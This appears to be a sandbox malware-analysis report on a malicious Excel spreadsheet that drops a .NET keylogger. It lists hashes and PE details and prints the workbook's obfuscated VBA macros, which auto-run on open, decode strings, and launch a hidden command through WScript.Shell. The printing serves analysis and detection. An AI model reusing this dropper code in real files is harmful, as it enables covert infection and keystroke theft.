Excel File Executes PowerShell to Download/Execute .Net Key Logger | Files
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Trojan, Dropper, Keylogger, Downloader

49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b (SHA256)

share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls

Excel Document

Created at 2018-04-18 14:33:00

Files Information

Number of sample files submitted for analysis 1
Number of files created and extracted during analysis 2
Number of files modified and extracted during analysis 0
c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls
Blacklisted
File Properties
Names c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls (Sample File)
Size 230.50 KB
Hash Values MD5: 16f7c7eef220983f255a9d4fce3d55bc
SHA1: 6004af991389c178f8c33f30fabd5d48bc2ce4c1
SHA256: 49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b
File Reputation Information
Information Value
Severity
Blacklisted
Names Unknown.Trojan.Agent
Families Agent
Classification Trojan
VBA Information
VBA Properties
Module Count 1
Macro Count 6
ThisWorkbook.cls - Activate Workbook
' Auto_Open: legacy Excel auto-run entry point. Decodes the hex blob with NPL_IO
' (on this page it evaluates to "AAJIKXLR_ZDEJXXX") and invokes that Sub through
' Application.Run, so the target name never appears in clear text in the module.
Public Sub Auto_Open()
    Application.Run NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
ThisWorkbook.cls - Eventless
' Forces explicit variable declaration for this module (VBA's default is implicit).
Option Explicit
' AAJIKXLR_ZDEJXXX: the name that NPL_IO("5E5E67666875696F7C77616267757575")
' decodes to. All three auto-run handlers on this page reach this Sub via
' Application.Run; it only forwards to the launcher WO_S.
Sub AAJIKXLR_ZDEJXXX()
    WO_S
End Sub
' NPL_IO: string decoder used by every macro in this module. Reads `text` as a
' run of two-character hex pairs, converts each pair to its byte value via the
' "&H" prefix, and appends Chr(byte - 29); e.g. "5E" -> &H5E (94) -> 94 - 29 -> "A".
' The Asc(Chr(...)) round trip is kept from the original; on single-byte code
' pages it is expected to hand the byte back unchanged, which the subtraction
' relies on. A trailing odd character is passed to Mid as a one-character pair,
' exactly as in the original. Returns a Variant holding the decoded String
' (empty for empty input).
Public Function NPL_IO(ByVal text As String)
    Dim decoded As String
    Dim pos As Long
    Dim pair As String
    pos = 1
    Do While pos <= Len(text)
        pair = Mid(text, pos, 2)
        decoded = decoded & Chr(Asc(Chr("&H" & pair)) - 29)
        pos = pos + 2
    Loop
    NPL_IO = decoded
End Function
' WO_S: the launcher. Creates a COM object whose ProgID is decoded at run time
' (NPL_IO("7470808F868D914B7085828989") evaluates to "WScript.Shell"), reads a
' second hex blob from worksheet "XPNop", cell J225, decodes it with NPL_IO and
' hands it to .Run with window style 0 (hidden window) and bWaitOnReturn = True.
' The command line itself lives in the sheet cell, not in this module; the report
' title attributes a PowerShell download/execute to it, which this listing alone
' cannot confirm. Detection note: the observable sequence is Excel -> late-bound
' WScript.Shell -> hidden child process, with the ProgID never present in clear text.
Public Sub WO_S()
    ' Late binding through VBA.CreateObject — presumably to avoid a project reference
    ' to the Windows Script Host library that static scanners would flag.
    Dim AO_RCV As Object: Set AO_RCV = VBA.CreateObject(NPL_IO("7470808F868D914B7085828989"))
    ' The eight String locals below are assigned but never read or passed to NPL_IO
    ' anywhere in the visible code — presumably junk padding added by the obfuscator.
    ' Do not treat them as a second payload without decoding and confirming.
    Dim WHX_B As String
WHX_B = "5C525C2E647F5C5C80855C36397D5C5C5C2E7E5C5C5C935C5C5C775C395C5C2C289B745C8C515C5C5F4851415C5C475C875E5C5C3337775C5C5C8F5C5C692A452A71565C4A355C3A645C5C6E5C8C5C5C555C63395C5C415C5C5C5C3B5C5C445C5C485C4D59455C525C5C2E665C205D335C8E5C2831803"
Dim DVZ_VG As String
DVZ_VG = "15C617A375C5C5C5C977262605C795C5C5C5C5C3A975C5C5C5C245C897D5C5C5C555C5C825C2C5C5C9C5C5C5C4C4031635C825C8D785D5C5C8236825C985C40205C1F5C222A5C5C5C815C2C6A8B5C4E5C945C5F5C6F77564220628F9A5C5C615C5C5C5C4A5C2C555C875C29784E5C785C5C5E5C5C6D5C"
Dim NG_EPT As String
NG_EPT = "5C5C7A1E5C4D9A395C5C915C5C5C214785666685746A5C5C775C5C685C625C6681612A8D5C5C5C945C5C5C915C5C8B5C755C765C5C865C5C935C44238D988E2C5C5C5C775C98965C5A5384925C5C5C5C5C7A9B26955C825C6E215C8D4D5F5C8273615C9B5C5C8A5C865C505C855C565C6E5C5C305C5C4"
Dim QM_M As String
QM_M = "4275C634D945C82295C5C2C5C875C535C5C5C5C43475C5C313C78848A5C5C3A9A5C5C5C5C39215C5C75753B5C372E2C405C5C79805C389B5C5C635C5C96585C6A9C5C4F425C5C5C46855C5C5C8C216674665C5C5C375C9243668A5C5C5C39905C42895C5C468D62505C1E655C5C5E85514D765C5C815C"
Dim KO_USI As String
KO_USI = "5C5C315C565C5C3C99665C878A3D8E5C5C3C5C49575C4A995C9C5C175C5C953E5C9578845C62305C5C505C5C5C5C2C5C275C61595C5C325C7E5C525C5C825C5C3C655C5C33635C5C5C8C84545C5C5C5C5C98595C457F9122652D5C835C895C5C63855C5C89875C5C715C5C5C459A5C325C5C2A5C74625"
Dim OA_SIR As String
OA_SIR = "C5E675C5C5C255C5C655C8F53285C2E5C5C5C5C933D5C4F5C5C357C5C5C5C3F4B5C3F5C5C5C685C5C63702887265C275C5B395C5C5C5C46545C89745C895C5C305C87838D5C5C5C5C4CD45C5C2B7F865C885C6D5C5C86445C5C6B945C9A5C73497A5C5C7C5C5C5C5C5C7A5C5C5C8A5C26555C345C5C5C"
Dim W_REJ As String
W_REJ = "8A245C265C91855C6C1D8E725C865C267D8F5C6F395C5C6E5C5C5C8B8A5C8D5C5C535C5C9481775C2D2A5C825C5C494E4B5C5C5C565C5C6A827E2A5C5C3A865C5C5C4F717D5C2A845C285C275C2F5C5C595B5C5C32843081526032745C5C5C623B5C5C5C5C5C5C5C74985C615F976B854C5C5C5C6B6A5"
Dim GY_USX As String
GY_USX = "C5C3C3A5C5C3E36655C3F4F5C5C7C8D644F5C5C3D5C5C5C5C8C5C308D765F5C4E475C5C5C5C778E5C7375395C798B5C5C5C7F635C4971285C755F225C5C91855C5C8B6D4A5C33415C8D5C495C5C5C5C954C5C995C785C38543589415C94996A515C5C3B5F5C5C4C5C5C5C7D5C5C5C7D5C5C848D5C5C2D805C525C955C1D5C5C4B5C5C5C8B5C7B5C5C1D94895C5C74294D5C2C295C655C6899295C755C5C5C5C4F5C5C5C874A635C2E5C5C2C5C525C61"

    ' Payload command comes from the workbook cell, decoded on the fly; 0 = hidden
    ' window, True = block until the child process exits.
    AO_RCV.Run NPL_IO(ThisWorkbook.Sheets("XPNop").Range("J225").Value), 0, True
End Sub
ThisWorkbook.cls - Open Workbook
' Workbook_Open: Excel's workbook-open event. Same decoded target as Auto_Open
' ("AAJIKXLR_ZDEJXXX"), here prefixed with "ThisWorkbook." — presumably so that
' Application.Run resolves the Sub inside this class module rather than searching
' standard modules. Two auto-run paths to the same launcher make detection of
' either one insufficient on its own.
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
ThisWorkbook.cls - Open Document
' Document_Open: this is Word's document-open event name; Excel does not raise it
' from a ThisWorkbook module, so the handler is most likely inert in this sample.
' NOTE(review): looks like a leftover from a Word-targeted build of the same
' dropper — confirm before counting it as a third execution path.
Public Sub Document_Open()
    Application.Run NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe
Blacklisted
File Properties
Names c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe (Created File)
Size 240.00 KB
Hash Values MD5: 8b70d9183b829c6c958b5ecabe95832f
SHA1: 6bdd34c6f0b0d5224899e47a615ce9d3c70c9f9d
SHA256: 8c77918a32167b1ccefb35c6f2a01803515ba6c055ff1d983c7b6c124b42ccd8
File Reputation Information
Information Value
Severity
Blacklisted
Names Win32.Trojan.2
Families 2
Classification Trojan
PE Information
Information Value
Image Base 0x400000
Entry Point 0x4380ce
Size Of Code 0x37000
Size Of Initialized Data 0x4000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2018-04-16 12:23:12
Compiler/Packer Unknown
Sections (3)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x402000 0x360d4 0x37000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.98
.rsrc 0x43a000 0x2900 0x3000 0x38000 CNT_INITIALIZED_DATA, MEM_READ 6.12
.reloc 0x43e000 0xc 0x1000 0x3b000 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 0.02
Imports (1)
mscoree.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
_CorExeMain 0x0 0x402000 0x380a8 0x370a8
Icons (1)
c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe
File Properties
Names c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe (Created File)
Size 0.00 KB (empty file: the MD5, SHA1 and SHA256 listed below are the digests of zero-length input, so they identify nothing sample-specific)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855